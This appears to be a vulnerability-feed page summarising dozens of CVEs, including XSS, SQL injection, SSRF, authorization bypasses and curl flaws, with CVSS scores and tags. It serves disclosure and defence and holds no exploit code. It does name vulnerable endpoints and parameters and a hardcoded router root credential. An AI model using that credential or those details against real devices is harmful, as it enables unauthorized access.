Inadequate access control in IdeaBox Creations Dashboard Welcome for Beaver Builder (versions through 1.0.8) permits unauthorized users to modify data without proper authentication. An unauthenticated attacker can exploit misconfigured security levels to perform unauthorized actions over the network with no user interaction required. No patch is currently available to address this vulnerability.
Authentication Bypass
-
CVE-2026-22487
MEDIUM
CVSS 4.3
Baqend Speed Kit versions through 2.0.2 contain an authorization bypass that allows authenticated users to modify data by exploiting misconfigured access control levels. An attacker with valid credentials could escalate privileges to alter information they should not have permission to change. No patch is currently available.
Authentication Bypass
-
CVE-2026-22486
MEDIUM
CVSS 5.3
The Hakob Re Gallery & Responsive Photo Gallery Plugin through version 1.17.18 contains an authorization bypass that permits unauthenticated attackers to modify gallery content due to improperly enforced access controls. This vulnerability affects all installations of the plugin and could allow attackers to alter or deface photo galleries without authentication. No patch is currently available.
Authentication Bypass
-
CVE-2026-22253
MEDIUM
CVSS 5.4
Soft Serve versions prior to 0.11.2 contain an authorization bypass in the LFS lock deletion endpoint that allows authenticated users to forcibly delete locks owned by other users by exploiting improper validation order. Any user with repository write access can leverage this vulnerability to disrupt collaborative workflows by removing locks created by teammates. A public exploit exists and patches are available.
Authentication Bypass
Soft Serve
Suse
-
CVE-2026-22246
MEDIUM
CVSS 6.5
Mastodon versions prior to 4.3.17, 4.4.11, and 4.5.4 fail to validate ownership when retrieving severed relationship lists, allowing any authenticated user to enumerate all lost followers and followed accounts across all severance events. This information disclosure vulnerability affects multi-user Mastodon instances where relationship changes due to moderation actions are visible to unauthorized users. An attacker with a local account can systematically access relationship data they should not have permission to view.
Golang
Mastodon
-
CVE-2026-22242
MEDIUM
CVSS 4.9
Blind SQL injection in CoreShop prior to version 4.1.8 allows authenticated administrators to extract sensitive database information through boolean-based or time-based attack techniques. The vulnerability is limited to information disclosure due to the application's read-only database permissions, preventing data modification or denial of service. Public exploit code exists for this vulnerability; administrators should upgrade to version 4.1.8 or later.
SQLi
Coreshop
-
CVE-2026-22233
MEDIUM
CVSS 5.5
Stored cross-site scripting in OPEXUS eCASE Audit enables authenticated users to inject malicious JavaScript through the "Estimated Staff Hours" comment field, which executes when other users access the Project Cost tab. This allows attackers with valid credentials to compromise other users' sessions and perform unauthorized actions within the application. No patch is currently available for this vulnerability.
XSS
Ecase Audit
-
CVE-2026-22232
MEDIUM
CVSS 5.5
Stored cross-site scripting in OPEXUS eCASE Audit's Project Setup functionality allows authenticated users to inject malicious JavaScript into the "A or SIC Number" field that executes in other users' browsers when they view the project. An attacker with valid credentials can exploit this to steal session tokens, perform unauthorized actions, or compromise data for all project viewers. No patch is currently available.
XSS
Ecase Audit
-
CVE-2026-22231
MEDIUM
CVSS 5.5
OPEXUS eCASE Audit's Document Check Out feature contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious JavaScript into comments, which executes in the browsers of other users viewing the Action History Log. This could enable attackers with valid credentials to steal session tokens, perform unauthorized actions, or compromise other users' accounts. No patch is currently available for affected installations.
XSS
Ecase Audit
-
CVE-2026-22041
MEDIUM
CVSS 5.3
Logging Redactor prior to version 0.0.6 fails to properly handle non-string data types during redaction operations, causing type conversion errors that can disrupt log formatting and integrity checks. Public exploit code exists for this vulnerability, allowing attackers to craft inputs that bypass the redaction mechanism or cause denial of service through malformed log output. Users of Logging Redactor should upgrade to version 0.0.6 or later, as no patch is currently available for affected earlier versions.
Python
Logging Redactor
-
CVE-2026-22032
MEDIUM
CVSS 4.3
Directus versions prior to 11.14.0 contain an open redirect vulnerability in the SAML authentication callback that allows unauthenticated attackers to redirect users to arbitrary external URLs by manipulating the RelayState parameter. The validation checks present during login initiation are not applied to the callback endpoint, enabling phishing and credential theft attacks. A patch is available in version 11.14.0 and later.
Open Redirect
Directus
-
CVE-2026-22028
MEDIUM
CVSS 6.1
HTML injection in Preact and React through unsafe JSON deserialization allows remote attackers to inject arbitrary scripts when applications pass unsanitized user-controlled data as component children, with public exploit code already available. The vulnerability stems from a regression in Preact 10.26.5 that weakened protections against constructing Virtual DOM elements from malicious JSON payloads. Affected applications are vulnerable if they consume unvalidated external data without sanitization and lack additional mitigations like Content Security Policy.
React
Preact
Redhat
Suse
-
CVE-2026-21896
MEDIUM
CVSS 5.7
Kirby CMS versions 5.0.0-5.2.1 fail to enforce permission checks in the content changes API, allowing authenticated users with restricted roles to modify site content despite having update permissions disabled. This affects only installations with custom permission configurations designed to prevent write access for specific user roles. A patch is available in version 5.2.2.
Authentication Bypass
Kirby
-
CVE-2026-21895
MEDIUM
CVSS 5.3
The RSA crate versions prior to 0.9.10 crash when constructing private keys with invalid prime components (such as 1), allowing an attacker to trigger a denial of service by providing malformed key material. This affects applications using the vulnerable RSA library for cryptographic operations. A patch is available in version 0.9.10 and later.
Industrial
Rsa
Redhat
Suse
-
CVE-2026-21894
MEDIUM
CVSS 6.5
n8n versions 0.150.0 through 2.2.1 lack webhook signature verification in the Stripe Trigger node, enabling unauthenticated attackers to forge Stripe events and trigger workflows by sending crafted POST requests to known webhook URLs. Affected users with active Stripe Trigger workflows could experience unauthorized execution of automation logic, potentially allowing attackers to simulate fraudulent payment or subscription events. A patch is available in version 2.2.2 and later.
Authentication Bypass
N8n
-
CVE-2026-21892
MEDIUM
CVSS 5.3
SQL injection in Parsl's visualization dashboard allows unauthenticated attackers to execute arbitrary database queries through unsafe string formatting of the workflow_id parameter. Public exploit code exists for this vulnerability, enabling potential data theft or database denial of service attacks against the monitoring infrastructure. The issue affects Parsl versions prior to 2026.01.05, which includes the fix.
Python
SQLi
Denial Of Service
Parsl
-
CVE-2026-21885
MEDIUM
CVSS 6.5
Miniflux's media proxy endpoint is vulnerable to Server-Side Request Forgery (SSRF) in versions prior to 2.2.16, allowing authenticated users to craft malicious proxy URLs that force the application to fetch and expose responses from internal network resources including localhost and private IP ranges. An attacker with valid credentials can abuse this to access sensitive internal services and metadata endpoints by embedding specially crafted URLs in feed content. Public exploit code exists for this vulnerability, and no patch is currently available for affected installations.
SSRF
Miniflux
Suse
-
CVE-2026-21883
MEDIUM
CVSS 5.4
Bokeh versions 3.8.1 and below allow attackers to bypass Origin validation in WebSocket connections by registering domains that suffix-match allowlisted domains (e.g., dashboard.corp.attacker.com for allowlist entry dashboard.corp), enabling unauthorized server interaction. Public exploit code exists for this vulnerability, which could allow attackers to access sensitive data or modify visualizations on behalf of victims. The issue is resolved in Bokeh 3.8.2.
Python
Bokeh
Redhat
Suse
-
CVE-2026-21880
MEDIUM
CVSS 5.3
Kanboard versions 1.2.48 and earlier contain an LDAP injection vulnerability where unsanitized user input in the LDAP authentication mechanism allows attackers to enumerate users, extract sensitive attributes, and target specific accounts. Public exploit code exists for this vulnerability. The issue is resolved in version 1.2.49 and later.
Ldap
Kanboard
-
CVE-2026-21879
MEDIUM
CVSS 4.7
Open redirect vulnerability in Kanboard versions 1.2.48 and below allows attackers to bypass URL validation and redirect authenticated users to malicious websites through specially crafted URLs. Public exploit code exists for this vulnerability, which can be leveraged for phishing attacks and credential theft. The vulnerability is resolved in version 1.2.49.
Open Redirect
Kanboard
-
CVE-2026-21874
MEDIUM
CVSS 5.3
NiceGUI versions 2.10.0 through 3.4.1 fail to properly release Redis connections when users open and close browser tabs, allowing unauthenticated attackers to exhaust the Redis connection pool and degrade service functionality. An attacker can repeatedly trigger connection leaks without authentication, causing storage errors and degraded performance once connection limits are reached. Public exploit code exists for this vulnerability, which is patched in version 3.5.0.
Python
Redis
Nicegui
-
CVE-2026-21872
MEDIUM
CVSS 6.1
NiceGUI versions 2.22.0 through 3.4.1 contain a stored cross-site scripting vulnerability in the click event listener of ui.sub_pages that executes attacker-controlled JavaScript when users click malicious links on the page. Public exploit code exists for this vulnerability, and affected users should upgrade to version 3.5.0 or later immediately. The vulnerability requires user interaction but can impact confidentiality and integrity with network-accessible exploitation.
Python
XSS
Nicegui
-
CVE-2026-21871
MEDIUM
CVSS 6.1
Cross-site scripting (XSS) in NiceGUI versions 2.13.0 through 3.4.1 allows attackers to execute arbitrary JavaScript in users' browsers when applications pass untrusted input to the ui.navigate.history.push() or ui.navigate.history.replace() functions due to improper string escaping in generated JavaScript. Public exploit code exists for this vulnerability, and developers using affected versions should upgrade to 3.5.0 or later, or avoid passing user-controlled data to these navigation helpers. Applications that only use these functions with trusted, hardcoded URLs are unaffected.
Python
XSS
Nicegui
-
CVE-2026-21860
MEDIUM
CVSS 5.3
Werkzeug versions prior to 3.1.5 fail to properly validate Windows reserved device names in the safe_join function, allowing attackers to bypass path restrictions by using device names with file extensions or trailing spaces (e.g., CON.txt, AUX ). This denial of service vulnerability affects Windows systems running vulnerable Werkzeug versions and could allow an unauthenticated remote attacker to access restricted files or cause application crashes. A patch is available in version 3.1.5 and later.
Windows
Werkzeug
Suse
-
CVE-2026-21859
MEDIUM
CVSS 5.8
Mailpit versions 1.28.0 and earlier contain a server-side request forgery vulnerability in the /proxy endpoint that permits unauthenticated attackers to probe and access internal network resources and services. The endpoint insufficiently validates destination addresses, allowing requests to internal IP ranges despite scheme validation. Public exploit code exists for this vulnerability, which is resolved in version 1.28.1.
SSRF
Mailpit
Suse
-
CVE-2026-21695
MEDIUM
CVSS 4.3
Titra time tracking software versions 0.99.49 and below contain a mass assignment vulnerability in their API that allows authenticated users to inject arbitrary fields into time entries through an unvalidated customfields parameter, enabling attackers to overwrite protected data such as user IDs, hours, and entry states. Public exploit code exists for this vulnerability which affects the integrity of tracked time data. The issue is resolved in version 0.99.50.
Code Injection
Titra
-
CVE-2026-21694
MEDIUM
CVSS 6.8
Unauthorized access control in Titra versions 0.99.49 and earlier enables authenticated users to view and modify time entries belonging to other users in private projects without proper authorization. Public exploit code exists for this vulnerability, affecting deployments that have not upgraded to version 0.99.50. The flaw allows authenticated attackers to compromise data integrity and confidentiality of other users' tracked time information.
Authentication Bypass
Titra
-
CVE-2026-21639
MEDIUM
CVSS 5.4
Remote code execution in Ubiquiti airMAX and airFiber wireless products allows adjacent attackers to execute arbitrary code on affected devices via a flaw in the airMAX Wireless Protocol without requiring authentication. Vulnerable versions include airMAX AC 8.7.20 and earlier, airMAX M 6.3.22 and earlier, airFiber AF60-XG 1.2.2 and earlier, and airFiber AF60 2.6.7 and earlier. Patches are available for all affected products.
RCE
Airmax Ac Firmware
Airfiber Af60 Firmware
Airfiber Af60 Xg Firmware
Airmax M Firmware
-
CVE-2026-0731
MEDIUM
CVSS 5.3
A null pointer dereference in TOTOLINK WA1200 5.9c.2914's HTTP request handler (cstecgi.cgi) allows remote unauthenticated attackers to trigger a denial of service condition. Public exploit code is available for this vulnerability, increasing the risk of active exploitation. A patch is not currently available, leaving affected devices vulnerable until an update is released.
Null Pointer Dereference
Wa1200 Poe
Wa1200 Poe Firmware
-
CVE-2026-0729
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 add_activity.php file allows authenticated administrators to manipulate the Title parameter and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw enables an authenticated attacker with high privileges to compromise data confidentiality and integrity.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0728
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin deletion function allows authenticated attackers with high privileges to manipulate the admin_id parameter and execute arbitrary database queries remotely. Public exploit code is available for this vulnerability, which affects PHP-based deployments. The vulnerability enables unauthorized data access, modification, and potential denial of service with no patch currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0707
MEDIUM
CVSS 5.3
Keycloak's Authorization header parser improperly tolerates non-RFC 6750 compliant formatting, including tabs and case variations in Bearer token authentication. This lax validation could enable attackers to bypass authentication mechanisms or manipulate token validation logic in applications relying on strict Bearer token parsing. No patch is currently available for this medium-severity vulnerability.
Information Disclosure
Redhat
-
CVE-2026-0701
MEDIUM
CVSS 4.7
SQL injection in the admin panel of code-projects Intern Membership Management System 1.0 allows authenticated attackers with high privileges to manipulate the Username parameter in /intern/admin/add_admin.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, and no patch is currently available. Affected organizations should restrict administrative access and consider implementing input validation controls or upgrading to a patched version when available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0699
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the activity_id parameter in edit_activity.php, potentially leading to unauthorized data access, modification, or deletion. Public exploit code exists for this vulnerability, though no patch is currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0698
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows authenticated attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_students.php and execute arbitrary database queries. Public exploit code exists for this vulnerability, enabling attackers to read, modify, or delete sensitive data. No patch is currently available to remediate this issue.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0697
MEDIUM
CVSS 4.7
SQL injection in the Intern Membership Management System 1.0 admin panel allows remote attackers with high privileges to manipulate the admin_id parameter in /intern/admin/edit_admin.php, potentially enabling unauthorized data access or modification. Public exploit code exists for this vulnerability, and no patch is currently available.
PHP
SQLi
Intern Membership Management System
-
CVE-2026-0676
MEDIUM
CVSS 5.3
G5Theme Zorka versions up to 1.5.7 contain a missing authorization vulnerability that allows unauthenticated remote attackers to modify data through incorrectly configured access controls. An attacker can exploit this to perform unauthorized state-changing operations without proper authentication or user interaction. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-0674
MEDIUM
CVSS 4.3
Campaign Monitor Campaign Monitor for WordPress forms-for-campaign-monitor is affected by missing authorization (CVSS 4.3).
WordPress
-
CVE-2026-0671
MEDIUM
CVSS 6.1
Mediawiki-Extensions-Uploadwizard versions up to 1.39 is affected by cross-site scripting (xss) (CVSS 6.1).
Mediawiki
XSS
Mediawiki Extensions Uploadwizard
-
CVE-2025-69169
MEDIUM
CVSS 5.4
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through <= 1.1.11. [CVSS 5.4 MEDIUM]
XSS
-
CVE-2025-68892
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gopiplus@hotmail.com Scroll rss excerpt scroll-rss-excerpt allows Reflected XSS.This issue affects Scroll rss excerpt: from n/a through <= 5.0. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-68890
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hands01 e-shops e-shops-cart2 allows DOM-Based XSS.This issue affects e-shops: from n/a through <= 1.0.4. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-68875
MEDIUM
CVSS 5.4
jcaruso001 Flaming Password Reset flaming-password-reset is affected by cross-site scripting (xss) (CVSS 5.4).
XSS
-
CVE-2025-68867
MEDIUM
CVSS 6.5
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in anibalwainstein Effect Maker effect-maker allows DOM-Based XSS.This issue affects Effect Maker: from n/a through <= 1.2.1. [CVSS 6.5 MEDIUM]
XSS
-
CVE-2025-68718
MEDIUM
CVSS 5.4
KAYSUS KS-WR1200 routers with firmware 107 expose SSH and TELNET services on the LAN interface with hardcoded root credentials (root:12345678). The administrator cannot disable these services or change the hardcoded password. [CVSS 5.4 MEDIUM]
Ssh
Ks Wr1200 Firmware
-
CVE-2025-68158
MEDIUM
CVSS 5.7
Authlib is a Python library which builds OAuth and OpenID Connect servers. [CVSS 5.7 MEDIUM]
Python
CSRF
Redhat
Suse
-
CVE-2025-67933
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS.This issue affects Taskbuilder: from n/a through <= 4.0.9. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67932
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS.This issue affects Listeo Core: from n/a through < 2.0.19. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67930
MEDIUM
CVSS 6.1
Vernon Systems Limited eHive Search ehive-search is affected by cross-site scripting (xss) (CVSS 6.1).
XSS
-
CVE-2025-67927
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS.This issue affects Link Whisper Free: from n/a through <= 0.8.8. [CVSS 6.1 MEDIUM]
Aws
XSS
-
CVE-2025-67922
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Reflected XSS.This issue affects Grand Restaurant: from n/a through < 7.0.9. [CVSS 6.1 MEDIUM]
XSS
Grand Restaurant
-
CVE-2025-67918
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WofficeIO Woffice woffice allows Reflected XSS.This issue affects Woffice: from n/a through <= 5.4.30. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67916
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Astoundify Jobify jobify allows Reflected XSS.This issue affects Jobify: from n/a through <= 4.3.0. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-67825
MEDIUM
CVSS 5.5
An issue was discovered in Nitro PDF Pro for Windows before 14.42.0.34. In certain cases, it displays signer information from a non-verified PDF field rather than from the verified certificate subject. [CVSS 5.5 MEDIUM]
Windows
Nitro Pdf Pro
-
CVE-2025-67091
MEDIUM
CVSS 6.5
Ax1800 Firmware versions up to 4.2.0 is affected by improper restriction of excessive authentication attempts (CVSS 6.5).
Authentication Bypass
Ax1800 Firmware
-
CVE-2025-67090
MEDIUM
CVSS 5.1
Ax1800 Firmware versions up to 4.2.0 is affected by improper restriction of excessive authentication attempts (CVSS 5.1).
Authentication Bypass
Ax1800 Firmware
-
CVE-2025-65731
MEDIUM
CVSS 6.8
Dir-605L Firmware versions up to 6.02cn02 is affected by missing authentication for critical function (CVSS 6.8).
D-Link
Dir 605l Firmware
-
CVE-2025-61550
MEDIUM
CVSS 5.4
Cross-Site Scripting (XSS) is present on the ctl00_Content01_fieldValue parameters on the /psp/appNet/TemplateOrder/TemplatePreview.aspx endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.69). [CVSS 5.4 MEDIUM]
XSS
Print Shop Pro Webdesk
-
CVE-2025-61549
MEDIUM
CVSS 6.1
Cross-Site Scripting (XSS) is present on the LoginID parameter on the /PSP/app/web/reg/reg_display.asp endpoint in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). Unsanitized user input is reflected in HTTP responses without proper HTML encoding or escaping. [CVSS 6.1 MEDIUM]
XSS
Print Shop Pro Webdesk
-
CVE-2025-61547
MEDIUM
CVSS 6.8
Print Shop Pro Webdesk versions up to 18.34 is affected by cross-site request forgery (csrf) (CVSS 6.8).
CSRF
Print Shop Pro Webdesk
-
CVE-2025-27004
MEDIUM
CVSS 6.1
LambertGroup Famous - Responsive Image And Video Grid Gallery WordPress Plugin famous_grid_image_and_video_gallery is affected by cross-site scripting (xss) (CVSS 6.1).
WordPress
XSS
PHP
-
CVE-2025-27002
MEDIUM
CVSS 6.1
LambertGroup CountDown With Image or Video Background countdown-with-background is affected by cross-site scripting (xss) (CVSS 6.1).
XSS
-
CVE-2025-22725
MEDIUM
CVSS 5.4
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in loopus WP Virtual Assistant VirtualAssistant allows Stored XSS.This issue affects WP Virtual Assistant: from n/a through <= 3.0. [CVSS 5.4 MEDIUM]
XSS
-
CVE-2025-15079
MEDIUM
CVSS 5.3
When doing SSH-based transfers using either SCP or SFTP, and setting the
known_hosts file, libcurl could still mistakenly accept connecting to hosts
*not present* in the specified file if they were added as recognized in the
libssh *global* known_hosts file. [CVSS 5.3 MEDIUM]
Ssh
Information Disclosure
Curl
Suse
-
CVE-2025-14984
MEDIUM
CVSS 6.4
The Gutenverse Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file upload in all versions up to, and including, 2.3.2. [CVSS 6.4 MEDIUM]
WordPress
XSS
PHP
-
CVE-2025-14819
MEDIUM
CVSS 5.3
When doing TLS related transfers with reused easy or multi handles and
altering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally
reuse a CA store cached in memory for which the partial chain option was
reversed. Contrary to the user's wishes and expectations. [CVSS 5.3 MEDIUM]
Tls
Curl
Suse
-
CVE-2025-14524
MEDIUM
CVSS 5.3
When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer
performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP,
POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new
target host. [CVSS 5.3 MEDIUM]
Ldap
Curl
Suse
-
CVE-2025-14505
MEDIUM
CVSS 5.6
The ECDSA implementation of the Elliptic package generates incorrect signatures if an interim value of 'k' (as computed based on step 3.2 of RFC 6979 https://datatracker.ietf.org/doc/html/rfc6979 ) has leading zeros and is susceptible to cryptanalysis, which can lead to secret key exposure. [CVSS 5.6 MEDIUM]
Information Disclosure
Redhat
-
CVE-2025-14275
MEDIUM
CVSS 6.4
The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 3.0.1 due to insufficient input sanitization in the countdown widget's redirect functionality. [CVSS 6.4 MEDIUM]
WordPress
XSS
PHP
-
CVE-2025-14017
MEDIUM
CVSS 6.3
When doing multi-threaded LDAPS transfers (LDAP over TLS) with libcurl,
changing TLS options in one thread would inadvertently change them globally
and therefore possibly also affect other concurrently setup transfers. [CVSS 6.3 MEDIUM]
Tls
Ldap
Curl
Redhat
Suse
-
CVE-2025-13679
MEDIUM
CVSS 6.5
The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_order_by_id() function in all versions up to, and including, 3.9.3. [CVSS 6.5 MEDIUM]
WordPress
PHP
-
CVE-2025-13504
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins Real Estate Pro real-estate-pro allows Reflected XSS.This issue affects Real Estate Pro: from n/a through <= 2.1.4. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2025-13034
MEDIUM
CVSS 5.9
When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`
with the curl tool,curl should check the public key of the server certificate
to verify the peer. [CVSS 5.9 MEDIUM]
Authentication Bypass
Curl
Suse
-
CVE-2025-12640
MEDIUM
CVSS 4.3
The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. [CVSS 4.3 MEDIUM]
WordPress
PHP
-
CVE-2025-12551
MEDIUM
CVSS 6.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in e-plugins ListingHub listinghub allows Reflected XSS.This issue affects ListingHub: from n/a through 1.2.6. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2019-25295
MEDIUM
CVSS 6.5
The WP Cost Estimation plugin for WordPress is vulnerable to Upload Directory Traversal in versions before 9.660 via the uploadFormFiles function. This allows attackers to overwrite any file with a whitelisted type on an affected site. [CVSS 6.5 MEDIUM]
WordPress
Path Traversal
-
CVE-2019-25290
MEDIUM
CVSS 5.3
Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. [CVSS 5.3 MEDIUM]
SSRF
-
CVE-2019-25284
MEDIUM
CVSS 6.1
V-SOL GPON/EPON OLT Platform v2.03 contains multiple reflected cross-site scripting vulnerabilities due to improper input sanitization in various script parameters. [CVSS 6.1 MEDIUM]
XSS
-
CVE-2019-25280
MEDIUM
CVSS 6.1
Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions. [CVSS 6.1 MEDIUM]
PHP
XSS
-
CVE-2019-25278
MEDIUM
CVSS 5.9
Facesentry Access Control System Firmware versions up to 5.7.0 is affected by cleartext transmission of sensitive information (CVSS 5.9).
Authentication Bypass
Information Disclosure
Facesentry Access Control System Firmware
-
CVE-2019-25277
MEDIUM
CVSS 6.1
Facesentry Access Control System Firmware versions up to 5.7.0 is affected by cross-site scripting (xss) (CVSS 6.1).
PHP
XSS
Facesentry Access Control System Firmware
-
CVE-2019-25270
MEDIUM
CVSS 6.1
SOCA Access Control System 180612 contains a cross-site scripting vulnerability in the 'senddata' POST parameter of logged_page.php that allows attackers to inject malicious scripts. [CVSS 6.1 MEDIUM]
PHP
XSS
-
CVE-2019-25259
MEDIUM
CVSS 5.3
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. [CVSS 5.3 MEDIUM]
CSRF
-
CVE-2017-20212
MEDIUM
CVSS 6.2
FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains an information disclosure vulnerability that allows unauthenticated attackers to read arbitrary files through unverified input parameters. [CVSS 6.2 MEDIUM]
PHP
Information Disclosure
-
CVE-2026-0747
LOW
CVSS 3.3
Exposure of sensitive information in the TeamViewer entry dashboard component in Devolutions Remote Desktop Manager 2025.3.24.0 through 2025.3.28.0 on Windows allows an external observer to view a password on screen via a defective masking feature, for example during physical observation or screen sharing. [CVSS 3.3 LOW]
Windows
-
CVE-2026-0730
LOW
CVSS 2.4
Staff Leave Management System versions up to 1.0 is affected by cross-site scripting (xss) (CVSS 2.4).
XSS
-
CVE-2025-67858
None
A Improper Neutralization of Argument Delimiters vulnerability in Foomuuri can lead to integrity loss of the firewall configuration or further unspecified impact by manipulating the JSON configuration passed to `nft`. This issue affects Foomuuri: from ? before 0.31.
Information Disclosure
-
CVE-2025-67603
None
A Improper Authorization vulnerability in Foomuuri llows arbitrary users to influence the firewall configuration.This issue affects Foomuuri: from ? before 0.31.
Authentication Bypass
-
CVE-2025-66003
None
An External Control of File Name or Path vulnerability in smb4k allowsl ocal users to perform a local root exploit via smb4k mounthelper if they can access and control the contents of a Samba shareThis issue affects smb4k: from ? before 4.0.5.
Information Disclosure
-
CVE-2025-66002
None
An Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability allows local users ton perform arbitrary unmounts via smb4k mount helper
Code Injection
-
CVE-2025-15346
None
A vulnerability in the handling of verify_mode = CERT_REQUIRED in the wolfssl Python package (wolfssl-py) causes client certificate requirements to not be fully enforced.
Python
Tls
-
CVE-2025-15224
LOW
CVSS 3.1
When doing SSH-based transfers using either SCP or SFTP, and asked to do
public key authentication, curl would wrongly still ask and authenticate using
a locally running SSH agent. [CVSS 3.1 LOW]
Ssh
-
CVE-2025-8307
None
Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. Passwords of all users are stored in a database in an encoded format.
Information Disclosure
-
CVE-2025-8306
None
Asseco InfoMedica is a comprehensive solution used to manage both administrative and medical tasks in the healthcare sector. A low privileged user is able to obtain encoded passwords of all other accounts (including main administrator) due to lack of granularity in access control.
Authentication Bypass
-
CVE-2025-4596
None
Asseco ADMX system is used for processing medical records. It allows logged in users to access medical files belonging to other users through manipulation of GET arguments containing document IDs.
Authentication Bypass